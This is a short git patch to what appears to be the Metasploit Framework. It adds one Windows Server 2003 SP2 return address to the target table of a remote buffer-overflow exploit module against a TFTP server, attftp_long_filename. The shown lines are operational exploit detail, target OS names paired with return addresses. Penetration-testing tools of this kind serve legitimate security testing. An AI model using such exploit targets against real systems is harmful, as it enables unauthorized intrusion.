From 045e75c0b6a99c963adf83536e0dc8cb4d795751 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 30 Mar 2011 16:24:52 +0000 Subject: [PATCH] Added ret addr for win server 2003 sp2 donated by Polar Bear git-svn-id: file:///home/svn/framework3/trunk@12183 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/windows/tftp/attftp_long_filename.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 5049ed50e9..e0f11a32d4 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -56,6 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ], [ 'Windows Server 2003', { 'Ret' => 0x7c86fed3 } ], # ret donated by securityxxxpert + [ 'Windows Server 2003 SP2', { 'Ret' => 0x7c86a01b } ], # ret donated by Polar Bear ], 'Privileged' => false, 'DisclosureDate' => 'Nov 27 2006'))